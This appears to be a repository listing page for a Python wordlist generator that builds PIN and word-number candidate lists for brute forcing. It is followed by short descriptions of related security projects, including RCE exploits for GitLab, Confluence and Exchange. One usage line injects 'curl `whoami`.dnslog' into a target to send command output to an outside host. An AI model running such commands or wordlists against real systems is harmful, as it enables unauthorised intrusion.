A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

Overview

Codex - Wordlist Generator

Please let me know what you think! https://github.com/Codex-Major/Wordlist-Generator/discussions

Install:

git clone http://www.github.com/codex-Major/Wordlist-Generator
cd Wordlist-Generator
python3 codex.py

New things

  1. You may now supply more than three wordtypes for concatenation.
  2. Full CLI Usage.

Common usage:

python3 codex.py -c colors.txt -t color -r -of modifiedColors.txt

python3 codex.py -w formnumber4 -of pins.txt -rng 1000

python3 codex.py -a /usr/share/wordlists/dirb/common.txt -t web --confirm
  (One of my favorites.)

The CONF.json file

Inside your CONF.json file are three things... verbose, prettify_json, and symbols.

Verbose - If "True", adds verbosity to the program. If "False", disables alot of the chatter.
Prettify - If "True", allows for much easier navigation and reading of your DICTIONARY.json.
Symbols - *WIP

Commands:

(-h)elp | Gives this output.

    (-w)rite | Writes a new File with the specified wordtypes.
        
        [?] If no path is given, the new text file is created in the same
             directory that this script resides in.
          
            E.g.: 
                -w /path/to/any/dir/newFilename.rtf color:animal:formnumber3
                -w /wordlists/newFilename.txt color:noun:formnumber3
                -w newFilename.txt verb:noun:number

        [?] It is no longer necessary that you supply any : for one type.
            
            E.g.: [*] These all write the same thing
                -w newFilename.txt number
                -w newFilename.txt :number:
                -w newFilename.txt ::number

-a verbs.txt verbs -a nouns.txt nouns ">
    (-a)dd | Adds words from a specified file to the script's wordlists.
        
        [!] Files must have each line contain a single word.
        [!] If a word has " or \\ in it, this script will try to remove it.
            
            Acceptable:
                        word1
                        word2
                        word3
                        word4
                        word5

            Unacceptable:
                        "word1"
                        \word

        [!] Add can only add from one file at a time.

            E.g.: -a /path/to/wordlist/Words.txt 
   
    
                -a verbs.txt verbs
                -a nouns.txt nouns

   

    (-c)heck | Checks a file for existing words and words with symbols in them.

        [!] Acceptable wordlists contain a single word in each line with no symbols.
            [?] Unacceptable Symbols: \ and "

    [*] Args:| {this will change as more lists are added to DICTIONARY.json} |

        [*] color - I.e. ["red", "yellow", "blue"]

        [*] adjective - I.e. ["small", "shiny", "pretty"]

        [*] animal - I.e. ["cat", "dog", "fish"]

        [*] noun - I.e ["banana", "race", "car"]

        [*] verb - I.e. ["jump", "run", "swim"]
            [*] "ing" is added to the end of most verbs

        [*] number - I.e. [""]

        [*] formnumber2 - I.e. [00, 01, 02, 03]

        [*] formnumber3 - I.e. [000, 001, 002, 003]
        
        [*] formnumber4 - I.e. [0000, 0001, 0002, 0003]
        (and so on... 9 max.)

    [?] E.g.:\n 
        [?] color:animal:formnumber3  - #1,646,352 words.
            [*]Writes things like: redshark001 or greentiger999.

        [?] noun:noun:formnumber2  - #22,498,789 words.
            [*]Writes things like: roomservice02 or waterdamage999.

        [?] adj:noun:number  - #256,383,360 words.
            [*]Writes things like: poisonapple2 or ancientpalace123.

        [?] :number: will write one decimal: 1 ;

        [?] :formnumber2: - will write two decimals: 01 ;

        [?] :formnumber4: - #9999 integers.
            [*] Writes four-digit pins.

        [?] :formnumber9: - will write nine decimals: 000000001

Owner
Codex
Just a lonely cyber-ninja.
Codex
Driver Buddy Reloaded is an IDA Pro Python plugin that helps automate some tedious Windows Kernel Drivers reverse engineering tasks.

Driver Buddy Reloaded Quickstart Table of Contents Installation Usage About Driver Buddy Reloaded Finding DispatchDeviceControl Labelling WDM & WDF St

Paolo 'VoidSec' Stagno 199 Jan 04, 2023
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

6 Sep 22, 2022
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 08, 2023
CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

FQ Hsu 63 Dec 30, 2022
"Video Moment Retrieval from Text Queries via Single Frame Annotation" in SIGIR 2022.

ViGA: Video moment retrieval via Glance Annotation This is the official repository of the paper "Video Moment Retrieval from Text Queries via Single F

Ran Cui 38 Dec 31, 2022
这次是可可萝病毒!

可可萝病毒! 事情是这样的,我又开始不干正事了。 众所周知,在Python里,0x0等于0,但是不等于可可萝。 这很不好,我们得把它改成可可萝! 效果 一般的Python—— Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC

黄巍 29 Jul 14, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
Grafana-0Day-Vuln-POC

Grafana V8.0+版本存在未授权任意文件读取 0Day漏洞 - POC 1 漏洞信息 1.1 基本信息 漏洞厂商:Grafana 厂商官网:https://grafana.com/ 1.2 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Gr

mik1th0n 3 Dec 13, 2021
Scans all drives for log4j jar files and gets their version from the manifest

log4shell_scanner Scans all drives for log4j jar files and gets their version from the manifest. Windows and Windows Server only.

Zdeněk Loučka 1 Dec 29, 2021
Show apps recorded storage files by jailbreak

0x101 Show registered storage files of apps by jailbreak Legal disclaimer: Usage of insTof for attacking targets without prior mutual consent is illeg

0x 4 Oct 24, 2022
Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

🏆 Pancakeswap BSC Sniper Bot web3 with honeypot detector (ANDROID WINDOWS MAC LINUX) 🥇 ⭐️ ⭐️ ⭐️ First SNIPER BOT for ANDROID & WINDOWS with honeypot

Mayank 12 Jan 07, 2023
2022-bridge - Example code belonging to the Bridge pattern video

Let's Take The Bridge Pattern To The Next Level This video covers how the bridge

11 Jun 14, 2022
Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use

Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use. Will try to add atleast 10 more tools currently use 7 sources to gather domains.

Harinder Singh 7 Jan 03, 2022
Safe Policy Optimization with Local Features

Safe Policy Optimization with Local Feature (SPO-LF) This is the source-code for implementing the algorithms in the paper "Safe Policy Optimization wi

Akifumi Wachi 6 Jun 05, 2022
QHack-2022 - Solutions to the Coding Challenges of QHack 2022

QHack 2022 Problems from Coding Challenges 2022. Rules and how it works To test

Isacco Gobbi 1 Feb 14, 2022
A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs. Fuzzing for more

Duc Linh Nguyen 4 Aug 08, 2022
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp lulz 117 Nov 28, 2022

A black hole for Internet advertisements

Network-wide ad blocking via your own Linux hardware The Pi-hole® is a DNS sinkhole that protects your devices from unwanted content, without installi

Pi-hole 40.3k Jan 09, 2023
An Advanced Local Network IP Scanner, made in python of course!

██╗██████╗    ██████╗ █████╗ █████╗ ███╗ ██╗███╗ ██╗███████╗██████╗ ██║██╔══██╗  ██╔════╝██╔══██╗██╔══██╗████╗ ██║████╗ ██║██╔════╝██╔══██

Polsulpicien 2 Dec 18, 2021